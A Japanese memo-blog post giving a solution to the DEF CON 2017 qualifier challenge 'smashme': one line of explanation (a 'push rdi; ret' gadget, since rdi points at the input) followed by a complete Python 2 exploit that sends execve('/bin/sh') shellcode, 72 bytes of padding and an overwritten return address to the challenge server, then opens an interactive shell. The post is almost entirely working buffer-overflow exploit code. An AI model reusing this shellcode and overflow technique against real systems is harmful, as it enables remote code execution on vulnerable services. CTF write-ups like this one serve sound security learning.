birabiraのめも

忘れっぽいのでここにメモをしていきます

defcon 2017 smashme

先輩の教えと、後輩の気付きを横取りして解いた
rdiに入力値の先頭アドレスがあったからpush rdi; ret;しただけ

import struct, socket, sys, telnetlib
 
def sock(remoteip, remoteport):
  """Open a TCP connection to (remoteip, remoteport) and return the socket.

  Args:
    remoteip: host name or IP address string handed to socket.connect.
    remoteport: TCP port number.

  Returns:
    A connected socket.socket; the caller owns it and must close it.
  """
  conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  conn.connect((remoteip, remoteport))
  return conn
 
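def read_until(f, delim='\n'):
  """Read one character at a time from f until the buffer ends with delim.

  Args:
    f: a file-like object exposing read(n).
    delim: terminator to stop at; it is kept in the returned value.

  Returns:
    Everything read so far, delim included.

  Raises:
    EOFError: if f is exhausted before delim appears.  read(1) returns an
      empty string at end of stream; without this check the empty string
      would be appended forever and the loop would never terminate.
  """
  buf = ''
  while not buf.endswith(delim):
    ch = f.read(1)
    if not ch:
      raise EOFError("stream ended before delimiter %r was seen" % (delim,))
    buf += ch
  return buf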
 
def shell(s):
  """Attach an already-connected socket to an interactive telnetlib session.

  Args:
    s: a connected socket.socket.  It is installed as the Telnet object's
      transport so that interact() relays the local terminal over it.

  Returns:
    None; the call does not return until interact() finishes.
  """
  session = telnetlib.Telnet()
  session.sock = s
  session.interact()

def p(x):
  """Pack the integer x as a 4-byte little-endian unsigned value ("<L")."""
  return struct.pack("<L", x)

# Hard-coded machine-code bytes as given in the writeup; kept exactly as-is
# and not analysed here.  This is a Python 2 script, so the str literal is a
# byte string.
shellcode = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

# Build the request body: the bytes above, a fixed marker string, then "A"
# padding so that the buffer is exactly 72 bytes before the packed address
# from the comment below is appended.
payload  = shellcode
payload += "Smash me outside, how bout d"
payload += "A" * (72 - len(payload))
payload += p(0x42ef4e) #0x0042ef4e: push rdi ; ret  ;  (1 found)


# Connect to the challenge host/port named in the writeup and send the
# payload plus a trailing newline in one send() call.  Under Python 2 the
# payload is a str, so no encoding step is needed; on Python 3 send()
# requires bytes and p() already returns bytes, so this line would fail.
s = sock("smashme_omgbabysfirst.quals.shallweplayaga.me",57348)
s.send(payload + "\n")

# Hand the open connection over to an interactive session.
shell(s)